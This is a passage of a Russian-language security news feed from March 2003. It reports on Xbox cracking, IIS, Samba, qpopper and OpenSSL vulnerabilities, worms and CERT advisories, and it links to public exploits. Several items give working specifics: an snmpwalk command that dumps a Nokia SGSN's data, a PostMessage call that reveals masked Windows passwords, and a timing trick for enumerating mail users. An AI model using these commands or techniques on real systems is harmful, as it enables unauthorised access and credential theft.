19/03/2003 09:26 Грандиозный проект по взлому приставки Xbox.
Продолжается конкурс по переносу операционной системы Linux на приставку Microsoft Xbox. Его первый этап, в ходе которого необходимо было просто запустить Linux на Xbox уже завершен - приз в 100 тысяч долларов США был разделен между несколькими победителями, сумевшими взломать защиту приставки с помощью мод-чипов. Успешно завершить вторую часть конкурса - запустить Linux на Xbox без аппаратных модификаций, реализовать оказалось значительно сложнее. Применяемая Microsoft система шифрования с использованием ключа длиной в 2048 бит пока оказалась хакерам не по зубам. За выполнение этой задачи также положен приз в 100 тысяч долларов. Интересно отметить, что вдохновителем и спонсором конкурса является Майкл Робертсон - основатель сайта MP3.com и компании Lindows.com. Не так давно сложность взлома шифра толкнула организаторов Xbox Linux обратиться к корпорации Microsoft с предложением официально сертифицировать Linux для запуска на Xbox. В качестве компенсации софтверный гигант мог получить те самые 100 тысяч долларов призовых. Само собой, в Microsoft это предложение проигнорировали. Более интересным является проект Operation Project X, запущенный в жизнь 10 марта нынешнего года. Его организаторы предлагают поучаствовать во взломе шифра Xbox всем желающим, организовав специализированную сеть распределенных вычислений. В настоящее время с сайта Operation Project X можно скачать клиентскую программу в версиях для Windows (в консольном и графическом вариантах), для Linux (предлагаются несколько клиентов, оптимизированных для разных процессоров), а также в исходных кодах. Подробности - http://www.compulenta.ru/2003/3/18/38322/
19/03/2003 08:16 Уязвимость в ptrace.
Как сообщает dl на bugtraq.ru, обнаруженная в ptrace (ядра 2.2 и 2.4) дыра позволяет локальному пользователю получить привилегии администратора. Alan Cox выпустил патч. Подробнее - http://marc.theaimsgroup.com/?l=linux-kernel&m=104791735604202&w=2
18/03/2003 18:44 Атака на МТУ-Интел.
Сегодня примерно с 11 до 14 часов доступ к некоторым российским и зарубежным сайтам был затруднен. Проблема возникла из-за флуда на внешних каналах интернет-провайдера "МТУ-Интел". Как сообщили в пресс-службе компании, на данный момент все проблемы разрешены, затруднения с трафиком возникли лишь у части абонентов и были в оперативном порядке ликвидированы. По информации неофициальных источников, провайдер подвергся сильнейшей атаке из-за рубежа. Источник - http://www.bugtraq.ru
18/03/2003 18:11 Подробности удаленного переполнения буфера в WebDAV компоненте в Microsoft IIS 5.0
Переполнение буфера обнаружено в Microsoft IIS 5.0. Уязвимость позволяет удаленному атакующему выполнять произвольный код на уязвимой системе. IIS 5.0 включает поддержку WebDAV, которая позволяет пользователям манипулировать файлами, сохраненными на Web сервере (RFC2518). Переполнение буфера обнаружено в компоненте ntdll.dll (часть кода, используемого в IIS WebDAV). Посылая специально обработанный запрос к IIS 5.0 серверу, атакующий может выполнить произвольный код с привилегиями Local System. По сообщениям, существует публично доступный эксплоит для этой уязвимости. Уязвимость обнаружена в Microsoft IIS 5.0 Microsoft оценил опасность этой уязвимости, как "Critical". Подробности - http://www.securitylab.ru/?ID=36543
18/03/2003 18:08 Хакеры нашли изъян в Windows 2000 раньше Microsoft
Компьютерные вандалы опередили компанию Microsoft и сумели воспользоваться брешью в операционной системе Windows 2000 до того, как о ней было объявлено официально. Используя недочет в 5-й версии Internet Information Server (IIS), злоумышленники атаковали сервер, принадлежащий армии США, сообщает BBC. Изъян Windows 2000 связан с приложением, управляющим протоколом World Wide Web Distributed Authoring and Versioning (WebDAV) в IIS. Специально сформированный веб-запрос к WebDAV может переполнить объем буфера памяти, что в конечном итоге позволит злоумышленнику получить контроль над сервером и либо лишить его работоспособности, либо запустить на нем собственную программу. Компания Microsoft выпустила предупреждение об указанной выше бреши и охарактеризовала ее как крайне опасную. По утверждению создателей Windows 2000, этот изъян дает хакерам возможность получить полный контроль над атакуемым сервером. Microsoft выпустила "заплатку", позволяющую ликвидировать опасный изъян. Источник - http://www.lenta.ru
18/03/2003 17:15 Обновления документации Linux VM
Mel Gorman объявил об обновлнии информационного проекта Understanding the Linux Virtual Memory Manager. На текущий момент данный обзор менеджера памяти Linux - один из наиболее подробных и удачных. PDF: http://www.csn.ul.ie/~mel/projects/vm/guide/pdf/understand.pdf HTML: http://www.csn.ul.ie/~mel/projects/vm/guide/html/understand Text: http://www.csn.ul.ie/~mel/projects/vm/guide/text/understand.txt
18/03/2003 07:48 Microsoft создает “самонастраивающееся” ПО.
Microsoft сообщила о создании инициативы создания делового программного обеспечения, обладающего возможностями самостоятельной адаптации и конфигурирования, что должно снизить стоимость владения компьютерными системами. Новый план, названный “Инициатива динамических систем” (Dynamic Systems Initiative - DSI), будет представлен на предстоящей на следующей неделе в Лас-Вегасе конференции разработчиков. Инициатива Microsoft стала очередной в ряде заявлений поставщиков компьютеров, таких, как IBM и Hewlett-Packard, которые также представили концепции “самонастраивающихся” компьютеров для делового применения. В рамках этих концепций ряд задач системных администраторов, таких, как настройка, конфигурирование и перераспределение нагрузки в локальной сети, будут выполняться автоматически. Microsoft считает DSI важным элементом новых технологий и планирует встроить ряд инструментов и компонентов в новую версию Windows Server, выходящую в апреле. Сторонним разработчикам будут доступны возможности по созданию “самонастраивающихся” приложений. Источник - http://www.cnews.ru
17/03/2003 14:36 Эксплоит для уязвимости в file.
Ранее мы сообщали об уязвимости в утилите file(1). Эксплоит не заставил себя долго ждать. Порадовали господа из польской группы LSD. Если не ошибаюсь - подобный эксплоит был выпущен господином Крейзи Эйнштейном из войд.ру. Эксплоит - http://packetstorm.linuxsecurity.com/0303-exploits/elfrape2.c
17/03/2003 13:30 Уязвимость в JDK.
Marc Schoenefeld обнаружил уязвимость в инструментарии разработке Java - JDK 1.4.1 JRE от Sun. Была обнаружена возможность локального переполнения буфера в API коде JVM. Однако, как указывает автор, использование уязвимости довольно таки затруднено, но возможность его была представлена на Blackhat Windows Security 2003 - конференции. Подробности - http://www.illegalaccess.org
17/03/2003 13:16 Прблема с линками в Windows.
Господин с интересной для всех "афганцев" фамилией Масуд обнаружил интересную уязвимость в ОС Windows. Оказывается сия операционная система не совсем правильно перключается между линками Виндоуз. Существет возможность создать линк, ссылающийся на другой линк. Подобная ситуация приводит к аврийному завершению explorer.exe/shell. Как замечает автор, пдобный линк невозможно создать стандартными средствами Windows - но его можно создать с помощью того же HEX-редактора. Как говорит автор - это дополнительное средство в руках создателей вирусов. Источник - http://www.securitylab.ru
17/03/2003 11:51 Статья "Настройка Siemens M50 в сети МТС на GPRS под FreeBSD 5.0".
Благодаря господину SHuRuP-у набрёл на довольно интересную статью - "Настройка Siemens M50 в сети МТС на GPRS под FreeBSD 5.0". Надеюсь - кому-то понадобится. Подробности - http://www.nixp.ru/cgi-bin/go.pl?q=articles;c=win;a=m50_gprs
16/03/2003 15:10 Обзор анализаторов беспроводных сетей.
На сайте NetworkMagazine опубликована очень интересная статья Энди Домана "Wireless LAN Analyzers: The Ultimate Hacking Tools?". Посвящена обзору современных анализаторов беспроводных сетей. Рассмотрены два стандарта WLAN, определённые IEEE - 802.11b (частота 2.4 ГГц) и 802.11a (частота 5 ГГц). Для обоих приведен довольно обширный список анализаторов. Обзор - http://www.networkmagazine.com/article/NMG20030305S0001
16/03/2003 14:08 Выход Crypto-Gram.
15 марта вышел очередной номер ежемесячного электронного журнала Crypto-Gram, выпускаемого Counterpane Internet Security, Inc. Журнал посвящён проблемам компьютерной безопасности и прикладной криптографии. В этом номере: Practical Cryptography, Crypto-Gram Reprints, SSL Flaw, The Doghouse: Random Cryptography Companies, News, Counterpane News, Security Notes from All Over: Woodland Ants, SSL Patent Infringement, Comments from Readers. Подробности - http://www.counterpane.com/crypto-gram-0303.html
16/03/2003 13:57 Серьёзнейшая уязвимость в Samba.
Группа исследователей безопасности исходного кода из SuSe (руководитель - Sebastian Krahmer) обнаружила уязвимость в популярном SMB-сервере для открытых систем Samba, позволяющую удалнно и анонимно получать права суперпользователя на сервере, на котором запущен демон smbd. Уязвимость присутствует в версиях 2.0.x - 2.2.7a. В случае невозможности немедленного обновления СИСАДМИНам рекомендуют перекрыть снаружи доступ по портам 139, 445. Возможность перезапуска буфера присутствует в кода сборки фрагментированных SMB/CIFS-пакетов, при этом удалённый злоумышленник получает возможность переписать адресное пространство процесса произвольными данными, и, как следствие, выполнить произвольный код от имени процесса smbd (обычно, root). Команда разработчиков SAMBA срочно выпустила новую версию - 2.2.8 и настоятельно рекомендует всем системным администраторам обновиться. Подробности - http://ru.samba.org/samba/whatsnew/samba-2.2.8.html
16/03/2003 13:25 Возможность раскрытия информации в qpopper.
Недавно мы писали об уязвимости в программе POP-3 сервера qpopper. Также в предыдущем сообщении была ссылка на так называемый тип атак timing attack. В подтверждении важности этого вида атак - это сообщение. Деннис Люберт из Германии обнаружил разницу в ответах POP-3 сервера qpopper в случае, если пользователь зарегистрирован в системе. В частности было замечено, что если пользователь существует, однако указан неверный пароль, то отключение от сервера просиходит по истечении 10 секунд, однако в случае отсутствии предполагаемого имени пользователя отключение происходит немедленно после ввода пароля. Результат подобной "особенности" qpopper-а очевиден - от возможностей формирования спам-листов до более "интересных" вещей. Выпущен соответствующий исходник, автоматизирующий перебор пользователей (poptest.cpp). ;) Работа проверялась на qpopper 3.1 и 4.0.4. Источник - http://www.securityfocus.com
16/03/2003 12:34 Уязвимость в OpenSSL.
David Brumley и Dan Boneh в процессе исследования так называемой временной атаки (timing attack), суть которой заключается в получении информации по анализу разницы в задержке ответа, обнаружили возможность восстановления RSA-ключей в процессе исследования ответов на запросы в количестве от 300.000 до 1.4 миллиона (нормальное количество запросов, да? ;) ). Тестировались также другие криптобиблиотеки, в частности, NSS из Мозиллы, Crypto++. Уязвимость была обнаружена в связке Apache + mod_SSL и в stunnel. Подробности - http://crypto.stanford.edu/~dabo/abstracts/ssl-timing.html
16/03/2003 12:09 Утечка информации в Windows.
Palan, исследователь из сетевой лаборатории Virginia Tech. сообщает о возможности получения пароля с использованием Win32 PostMessage API. Подробное изложение технологии заняло бы довольно много места. Вкратце суть сводится к следующему - используя PostMessage(hwnd, EM_SETPASSWORDCHAR, 0, 0) можно раскрыть пароль в диалоговой форме, после чего используя стандартный API скопировать его через буфер в обход защиты WM_GETTEXT. Обнаружено в Win2K, XP. Подробности - http://www.security.nnov.ru/search/document.asp?docid=4213
16/03/2003 11:46 Кazaa обвиняется в распространении детской понрнографии.
Как сообщает CNET News.com, на рассмотрение в Конгресс было представлено два документа, где автор указывает на очевидные доказательства, уличающие KaZaA в распространении детской порнографии. Найти порнографические фотографии на сайте KaZaA было не так уж сложно. Автор всего лишь набрал в строке поиска такие слова как «несовершеннолетний», «инцест» и «десятилетний ребенок» получив в результате отнюдь не безобидные картинки. Для непобедимой в битве с медиагигантами KaZaA 37-страничный документ может оказаться смертным приговором, если Конгресс найдет, что представленные доказательства против пиринговой сети достаточно веские для ее запрещения. Второе обвинение, выдвинутое House Government Reform Committee против KaZaA состоит в том, что KaZaA не предприняла соответствующих мер по блокировки запрещенного контента в своих файлообменных сетях. В House Government Reform Committee отказались от комментариев, решив дождаться решения Конгресса, который в последнее время уделяет особое внимание к Интернету и правам детей в Интернете. Источник - http://www.internet.ru
16/03/2003 11:13 Международная конференция "NetSec 2003".
23-25 июня 2003 г. в Новом Орлеане (New Orleans) США, пройдет международная конференция "NetSec 2003", посвященная проблемам сетевой безопасности. На конференции будут рассмотрены проблемы безопасности Internet/intranet, электронной торговли, компьютерной преступности, защита от удаленных атак в Интернете, расследования киберпреступлений, быстрое реагирование на компьютерные инциденты, обнаружение вторжений, вопросы политики безопасности корпоративных сетей и другие проблемы сетевой безопасности. Планируется организовать выставку, на которой будут демонстрироваться более 70 экспонатов, представляющих интерес в решении вопросов обеспечения информационной безопасности. К участию в конференции приглашаются руководители служб информационной безопасности, системные администраторы, юристы, представители правоохранительных органов, специалисты и эксперты по вопросам информационной безопасности. Источник - http://www.crime-research.org
16/03/2003 10:06 Cтатья "Обнаружение атак своими силами".
На сайте Дмитрия Леонова bugtraq.ru очередное пополнение в библиотеке. Опубликована статья Алексея Лукацкого "Обнаружение атак своими силами". Алексей Викторович Лукацкий работает заместителем директора по маркетингу Научно-инженерного предприятия "Информзащита" (Москва) и является автором книг "Обнаружение атак" и "Атака из Internet". Как говорит сам автор во ступлении, основная цель статьи - показать, что даже при отсутствии или недостаточном финансировании можно построить достаточно надежную и эффективную систему информационной безопасности. Она будет уступать по своим характеристикам коммерческой системе, но зато на ее построение практически не потребуется тратить деньги. Рамки статьи не позволяют рассмотреть все аспекты создания "бесплатной" системы защиты и поэтому рассмотрен только один из ее аспектов - обнаружение сетевых атак. Статья - http://www.bugtraq.ru/library/security/luka/autodetect.html
15/03/2003 15:38 Network Traffic Generator.
Ссылку на довольно любопытную программу нашёл werf с SYSADMINS.RU. Программа Network Traffic Generator генерирует трафик от клиента к серверу, для проверки стабильности сети при сильной загрузке, а также тестирует пропускную способность роутеров и файрволов. На настоящий момент выпущена версия 0.1.3. В приведённой ниже ссылке можно найти как исходники, так и RPM и EXE-версии. Программа - http://twtelecom.dl.sourceforge.net/sourceforge/traffic/
15/03/2003 14:52 Исследование RSA.
На сайте Linux Journal опубликована ещё одна любопытная статья Джека Деннона "Exploring RSA Encryption", в которой описывается алгоритм шифрования RSA (назван так в честь своих основателей - Ривеста, Шамира, Альдемана). Также приведены примеры программ и использования алгоритма RSA. Статья - http://www.linuxjournal.com/article.php?sid=6695
15/03/2003 14:26 OpenBSD Packet Filter HOWTO.
Как сообщает opennet.ru, опубликовано новое руководство по использованию pf - пакетного фильтра OpenBSD. Рекомендуется к прочтению администраторам, обслуживющим OpenBSD. Ccылка - http://www.inebriated.demon.nl/pf-howto/
15/03/2003 13:43 Cтатья "Программирование на языке Ruby, часть 1".
На сайте Russian Linux Gazette появился очередной перевод. Это перевод оригинальной статьи, написанной Hiran Ramankutty - выполнен Андреем Киселёвым. Как следует из названия, сама статья посвящена программированию на языке Ruby. Ruby представляет собой объектно-ориентированный язык программирования интерпретирующего типа. Он был создан программистом из Японии -- Юкихиро Матсумото (Yukihiro Matsumoto), где этот язык пользуется большей популярностью нежели Python или Perl! Первая часть из серии является введением в основы языка Ruby. Более глубокий материал будет даваться в последующих частях. Не думаю, что в нашей стране язык Ruby пользуется большой популярностью, однако, если вдруг среди посетителей найдётся такой человек - думаю, эта статья окажется для него небезынтересной. Статья - http://gazette.linux.ru.net/lg81/ramankutty.html
15/03/2003 13:11 Появилась новая антиспамерская система.
Германская компания Cobion готовит к выпуску антиспамерский пакет OrangeBox Mail 2.0 и ПО для фильтрации OrangeBox Web Home. В отличие от других почтовых сканеров OrangeBox Mail 2.0 использует расширенный набор методов проверки сообщений. Характер отправления оценивается в реальном времени по десяти критериям. Чтобы определить ценность сообщения, OrangeBox Mail 2.0 с помощью фирменных алгоритмов анализирует текст письма, вложенные изображения, символы, вёрстку и даже распознавание лиц. Существующие же фильтры обрабатывают только текст, выявляя наличие в нём ключевых слов. В распоряжении Cobion имеется обширная база спам-сообщений, которая размещается на целой тысяче серверов, установленных в офисе компании в немецком городе Кассель, в Гессене. Там собирается нежелательная почта, сообщения идентифицируются, маркируются и хранятся в базе, чтобы затем сравнивать их поступающей корреспонденцией. Кроме этого, в базе имеются регулярно обновляемые "чёрные списки", куда включаются интернет-адреса, считающиеся источниками спама. OrangeBox Mail использует эти списки для блокирования сообщений, приходящих с указанных адресов. Подробнее - http://www.compulenta.ru/2003/3/14/38009/
15/03/2003 12:23 Специальный процессор для защиты от вирусов.
Американская компания SafeNet анонсировала специальный сопроцессор SafeXcel-4850, предназначенный для ускорения вычислений, связанных с обеспечением информационной безопасности. Новый чип может использоваться в системах обнаружения вторжений, брандмауэрах, коммутаторах, маршрутизаторах, вирусных сканерах и т.д. Он может обрабатывать IP-пакеты на всех уровнях OSI при максимальном размере пакета в 9 кбайт. SafeXcel-4850 позволяет проводить побайтовую проверку по нескольким шаблонам одновременно. При этом, в отличие от его программных аналогов, рост числа шаблонов не снижает производительности. Максимальная пропускная способность SafeXcel-4850 составляет 2,5 Гбит/с. В качестве памяти в нем используется высокоскоростная NPU/ZBT SyncBurst SSRAM, традиционно применяющаяся в сетевых устройствах. Тепловыделение SafeXcel-4850 составляет порядка 1 Вт. Корпус процессора - BGA, 468-контактный. SafeXcel-4850 выпускается как в виде отдельного чипа, так и виде PCI-карты SafeXcel 480-PCI. К нему SafeNet предлагает набор для разработчиков и специальный компилятор Regular Expression. Источник - http://www.safenet-inc.com
15/03/2003 12:00 Novell обновила ПО коллективной работы.
В среду на выставке CeBIT в Ганновере Novell представила новую версию своего ПО коллективной работы GroupWise 6.5 и пообещала в ближайшее время снабдить его поддержкой немедленного обмена сообщениями. GroupWise позволяет корпоративным пользователям управлять документами, обмениваться календарями и работать над проектами в разных операционных системах, включая Novell NetWare, Windows NT и Windows 2000. В числе изменений, внесенных в версию 6.5, усовершенствованный пользовательский интерфейс и возможность интеграции инструментов от независимых разработчиков. Система позволяет сотрудникам обращаться к деловой информации через веб-браузер на настольном или портативном ПК и через беспроводные устройства типа продукта BlackBerry компании Research In Motion. В следующем месяце компания обещает добавить GroupWise Messenger, позволяющий сотрудникам предприятия общаться друг с другом через защищенный механизм немедленного обмена сообщениями. В виде бета-версии GroupWise Messenger уже доступен. Компания утверждает, что GroupWise 6.5 отличается от предыдущей версии усовершенствованными средствами интеграции инструментов от независимых поставщиков, более надежной системой обмена сообщениями и повышенной стабильностью. Подробности - http://zdnet.com.com/2100-1104-992253.html
15/03/2003 11:13 Статья "Переполнение буфера и контрмеры".
На сайте Linux Journal опубликована статья Sandeep Grover под названием "Buffer Overflow Attacks and Their Countermeasures". Проблемы "переполнения буфера" всегда ассоциировались с уязвимостями в системе. В прошлом многие уязвимости в системе появлялись именно из-за проблем "переполнения буфера". Эта статья как раз и посвящена описанию ситуаций, связанных с переполнение буфера, как эта уязвимость может быть использована и какие меры необходимо предпринимать, чтобы избежать этой ситуации. Статья - http://www.linuxjournal.com//article.php?sid=6701
15/03/2003 10:48 DoS против NetScreen.
Отказ в обслуживании обнаружен в NetScreen 5XP и 5XT устройствах. Удаленный пользователь может, при некоторых условиях, перезагрузить устройство с потерей текущей конфигурации. Сообщается, что устройство возвратится к фабричным параметрам настройки, как и при жесткой перезагрузке, при возникновении очень специфических условий. Подробности “специфических условий” не разглашаются. NetScreen определил опасность обнаруженной уязвимости как “высокую”. Уязвимость обнаружена в NetScreen 4.0.0 (5XP и 5XT only) Подробности - http://www.netscreen.com/support/alerts/03_06_03.html
14/03/2003 17:31 Как обмануть NMAP?
Как известно определение типа удалённой ОС зачастую становится первым шагом, который осуществляет хакер при подготовке атаки на сервер (хост). Существую различные методы определения типа ОС, однако одним из самых совершенных на настоящий момент признана технология определения типа ОС по отпечаткам (remote OS Fingerprint), описанная Fyodor в одном из номеров электронного журнала PHRACK и успешно реализованная им в одном из лучших сканеров NMAP. Тем не менее, существуют различные методы и инструменты, позволяющие обмануть сканеры, подобные NMAP. Обзору таких методов и инструментов посвящена недавно выщедшая на сервере voodoo.somoslopeor.com статья David Barroso "A practical approach for defeating Nmap OS-Fingerprinting". Статья - http://voodoo.somoslopeor.com/papers/nmap.html
14/03/2003 16:23 Итоги Cybercrime Summit 2003.
С 24 по 26 февраля 2003 года при поддержке Института изучения проблем киберпреступности (The Southeast Cybercrime Institute) и Ассоциации Расследования Преступлений в Сфере Высоких Технологий (Atlanta High Tech Crime Investigation Association) в Атланте, США, состоялся Первый международный саммит по проблемам киберпреступности (The Southeast Cybercrime Summit 2003). В работе саммита приняли участие специалисты в области безопасности и защиты информационных технологий из США, Германии, Канады, Китая, Румынии, Болгарии, Венгрии и Украины (Computer Crime Research Center). Главной темой саммита стала проблема расследования компьютерных преступлений. В рабочих группах на обсуждение выносились вопросы, связанные с безопасностью IT технологий и противодействием киберпреступности. Из основных тем выступлений можно выделить следующие: кибербезопасность и национальная стратегия безопасности киберпространства, роль коммерческих структур в защите критической инфраструктуры, борьба с сексуальными преступниками в Интернете, борьба с детской порнографией, интернет-безопасность, защита национальной критической инфраструктуры, хищение информации, декодирование "криптографических файлов" при проведении судебной экспертизы, методика проведения допроса компьютерных преступников, реагирование спецслужб на совершение компьютерных преступлений и кибертерроризма, уголовно-процессуальные действия по делам о компьютерных преступлениях, информационная безопасность. Источник - http://www.crime-research.org
14/03/2003 15:25 Уязвимость в Nokia SGSN.
Ollie Whitehouse из @stake, Inc., cообщает об обнаружении уязвимости в Nokia SGSN - элементе сети DX200. SGSN (Serving GPRS support node) - это платформа для осуществления взаимодействия между сетью GSM и IP-частью GPRS-сети. Уязвимость обнаружена в реализации SNMP (Simple Network Management Protocol - протокол простого управления сетью) демона для сетей DX200. Позволяет получать данные SNMP-опций cо строкой сообщества ANY. В частности, команда snmpwalk <IP_of_SGSN> tellmeyoursecrets может выдать всю информацию базы управляющей информации (MIB). Производитель (Nokia) был оповещён и убрал поддержку SNMP в ПО. В качестве временной меры рекомендуется использовать файрволлы для ограничения доступа к данным SNMP. Подробности - http://www.atstake.com/research/advisories/2003/a031303-2.txt
14/03/2003 14:56 Хакеры три недели ломали сайт "Аль-Джазиры".
Группа хакеров в течение трех недель пыталась взломать сайт катарского спутникового телеканала "Аль-Джазира". Главный редактор сайта Абдельазиз Аль-Махмуд (Abdelaziz al Mahmud) считает, что за попытками взлома стоят либо хакеры, имеющие высокоскоростной канал на 100 мегабит в секунду, либо правительственная структура какой-то страны. Сайт сумел выдержать все атаки. Телеканал информировал своих провайдеров во Франции и США о попытках взлома. Правительства некоторых арабских стран неоднократно высказывали недовольство материалами телеканала. В знак протеста Саудовская Аравия отозвала своего посла из Катара, а Иордания, Кувейт и Палестинская автономия закрыли корпункты "Аль-Джазиры". Сайт канала сделан полностью на арабском языке, однако его основной аудиторией являются пользователи интернета из США и Европы. Источник - http://www.lenta.ru
14/03/2003 13:24 Бюллетень CERT CA-2003-08. Пользователи Windows в опасности.
11 марта выпущен бюллетень по безопасности CERT CA-2003-08 под названием "Increased Activity Targeting Windows Shares". В нём CERT сообщает об катастрофически увеличившемся за последнее время количестве инцидентов, связанных с взломом серверов и рабочих станций под управлением ОС WinXP, 2K. Основная масса взломанных машин имела или пустые или очень простые пароли пользователя Administrator (или равного ему по правам), а также очень простые пароли на разделяемые ресурсы компьютера (SMB-share). В ранних версиях Windows (95, 98, Me, NT) для осуществления механизма разделения ресурсов использовалась реализация NetBIOS over TCP/IP (NBT) с использованием портов 137/tcp и udp, 138/udp, 139/tcp. В Win2K, XP SMB запущен прямо через TCP/IP через порт 445/tcp. В последнее время замечено катастрофическое увеличение взломанных систем, а также появление инструментов, автоматизирующих процедуру обнаружения уязвимых систем, к которым относятся: черви W32/Deloder, W32/Slackor, IRC-боты GT-bot, sdbot. Описание каждого из них включено в бюллетень (о черве Deloder мы писали ранее). При взломе серверов злоумышленники используют их для установки бэкдоров, организации сети распределённой DoS-атаки (DDoS), дальнейшего распространения червя. Во многих случаях взоманнная система производит подключение к IRC-сети на специально организованные сервера, где ожидает команд на выполнение (применяются описанные выше боты). Зачастую для внедрения используются методы социальной инженерии. Довольно интересная технология замечена у червя Deloder. Помимо способности к распространению он также устанавливает копию VNC (Virtual Network Computing), слушающего порты 5800/tcp или 5900/tcp (используется свободно распространяемый remote display tool от AT&T). Сообщается об организации виртуальной сети с использованием бота sdbot в количестве 7.000 компьютеров и сети с использованием 140,000 компьютеров. Как обычно, в бюллетене CERT приведены меры по предотвращению взлома. Вкратце они сводятся к следующим: отключение разделения ресурсов компьютера, если в этом нет острой необходимости; использование криптостойких паролей; избегание случаев загрузки файлов из непроверенных источников; применение файрволлов для ограничения доступа к сети. Подробности - http://www.cert.org/advisories/CA-2003-08.html
14/03/2003 12:02 Выход Mozilla 1.3.
13 марта 2003 года проект Mozilla.org выпустил версию 1.3 комуникационной системы Mozilla, включающей веб-браузер, почтовый клиент, редакотр HTML, IRC-клиент. Одновременно вышла полностью локализованная русская версия Mozilla, подготовленная участниками проекта Mozilla.ru и ALT Linux Team. По сравнению с Mozilla-1.2.1, в новой версии реализованы: автоматическая фильтрация спама (почтовый клиент), улучшенное управление всплывающими окнами, настройки поиска по мере набора, доступ к любым параметрам конфигурации, автоматическое изменение размеров изображений, переключение профиля во время сеанса работы, улучшенные фильтры сообщений. Впервые, как сообщается на linux.org.ru, переводчиками проекта Mozilla.ru Валентиной Ванеевой и Вадимом Виниченко полностью переведен не только интерфейс, но и справочная система. Подробности - http://www.mozilla.ru/
14/03/2003 11:53 Cоздана объединенная структура обмена трафиком на базе SPB-IX и MSK-IX.
ЗАО "Раском" и Российский НИИ Развития Общественных Сетей (РОСНИИРОС) достигли соглашения о начале предоставления услуг объединенных точек обмена IP-трафиком (IX) в Москве и Петербурге на новом уровне. Суть новшества состоит в следующем: бывшие ранее отдельными узлами MSK-IX в Москве и SPB-IX в Санкт-Петербурге, стали теперь единой системой обмена трафиком. Благодаря использованию MPLS-сети GiganetТ, эти точки теперь объединены каналом MPLS-VPN с пропускной способностью 1,2 Гбит/с. Теперь участники SPB-IX получили возможность широкополосного обмена трафиком с московскими интернет-операторами. Раньше, чтобы иметь наилучший обмен трафиком с российскими сетями, провайдеры вынуждены были арендовать канал до Москвы и, дополнительно, платить за аренду порта в MSK-IX. Теперь необходимость в этом отпала и тот сервис, который предоставлял РОСНИИРОС для участников MSK-IX, теперь доступен и в северной столице. Internet-eXchange обеспечивают обмен трафиком между российскими Интернет сервис-провайдерами. В настоящее время к системе обмена трафиком подключено более ста провайдеров. Источник - http://www.cnews.ru
14/03/2003 11:35 Множественные уязвимости в Lotus Notes/Domino.
Rapid7, Inc. сообщает об обнаружении сразу 3-х уязвимостей в Lotus Notes/Domino. Выпущены соответствующие бюллетени с кодами R7-0010/0011/0012. Первая уязвимость связана с протоколом аутентификации Lotus Notes NotesRPC (порт 1352/TCP). Сформировав специальным образом пакет на этапе аутентификации, удалённый неавторизованный клиент может большую секцию кучи произвольными данными. Вторая уязвимость связана с возможностью переполнения буфера при выполнении запроса от клиента к Lotus Notes/Domino - серверу в качестве посредника. Обработка и доставка запросов в этом случае производится специальным процессом Web Retriever. При приёме им слишком длиннного значения статуса HTTP (пример - HTTP/1.1 200 Ax6000) с удалённого Web-сервера, Web Retriever сваливается. Если он запущен в качестве серверной задачи - зависает сам сервер. В случае же клиента Notes - сваливается сам клиент. Третья уязвимость обнаружена в результате тестирования протокола LDAP с использованием выпущенного финским университетом в Оулу инструмента под названием PROTOS. При проверке обнаружилась возможность вызвать переполнение буфера и DoS в Lotus Notes/Domino. Производитель (IBM) выпущены соотвествующие патчи и описания. Подробности - http://www.rapid7.com/advisories/
14/03/2003 10:29 Уязвимость в PostgreSQL.
Mordred Labs в своём бюллетене 0x0007 сообщает о возможности выполнения удалённого DoS в PostgreSQL. PostgreSQL - это современная объектно ориентированная СУБД с равширенными возможностями SQL-стандартов, включая транзакции. Уязвимость связана с тем, что при выделении памяти (задаётся в файле src/backend/libpq/auth.c) используется пользовательское значение, получаемое из входного потока. Для выполнения условия есть одно ограничение - хост атакующего должен быть прописан в файле pg_hba.conf. Уязвимость обнаружена в версиях до 7.2.2 включительно. В качестве меры для предотвращения атаки рекомендуется не давать доступ к СУБД "сомнительным" пользователям. Источник - http://mslabs.iwebland.com
13/03/2003 22:46 Code Red F - новое, но не забытое старое.
В сети обнаружена новая модификация интернет-червя Code Red - Code Red F. Уже зарегистрированы несколько случаев заражения данной вредоносной программой. Первая эпидемия инернет-червя - Code Red вспыхнула в июле 2001 года. 19 июля червь инфицировал более 250 тыс. систем по всему миру всего лишь за 9 часов. Для проникновения на удаленные компьютеры червь использует обнаруженную в июне 2001 г. брешь в системе безопасности Microsoft Internet Information Server (IIS), которая позволяет злоумышленникам запускать на удаленных серверах посторонний программный код. Во время первой эпидемии Code Red ущерб превысил миллиард долларов США. 4 августа 2001 г. была обнаружена новая модификация червя CodeRed - CodeRed.c. По сравнению с более ранними версиями, программный код "CodeRed.c" занимает меньше места и написан с большим знанием языка программирования Assembler. В этой версии также была исправлена ошибка, которая допускала существование нескольких активных процессов червя. Опасность Code Red F - новой версии старого червя - в том, что он открывает доступ для дисков C: и D:, что делает сервер уязвимым для доступа. Новый вариант Code Red F отличается от червя от Code Red II всего двумя байтами кода. Так же как и его предшественник, Code Red F сканирует IP-адреса на предмет обнаружения уязвимых веб-серверов Microsoft IIS 4.0 и 5.0. После обнаружения "больного" сервера, червь его заражает, вызывая ошибку переполнения буфера. Червь записывает свою копию в память и на диск сервера, а также создает файл под названием Trojan.VirtualRoot, который открывает хакерам полный доступ к пораженному веб-серверу. Источник - http://www.viruslist.ru
13/03/2003 17:19 Уязвимость в QPopper.
Обнаружена уязвимость в популярном POP3-сервере QPopper. Об этом сообщил Florian Heinz из Cronon AG. Связана она с уязвимостью в функции Qvsnprintf(), описанной Qualcomm в файле popper/pop_msg.c. Связана с некорректной обработкой нуль-прерывания (null-terminate) буфера. При этом происходит переполнение буфера. Qvsnprintf не заканчивает строку нулевым байтом при превышении максимальной длины строки. При этом успешный вызов strcat (например, strcat(message,"\r\n")) позволяет перезаписывать стек. Автор сообщает об успешных попытках запуска произвольного кода при помощи команды 'mdef' в qpopper-4.0.4-8 дистрибутива Debian. Также сообщается об успешном запуске команд в SuSE 8.1. Выпущен эксплоит для удалённого использования узвимости - с одним "но" - необходимо иметь логин на сервере. :) Эксплоит - http://nstx.dereference.de/snippets/qex.c
13/03/2003 16:08 Очередная уязвимость в Opera.
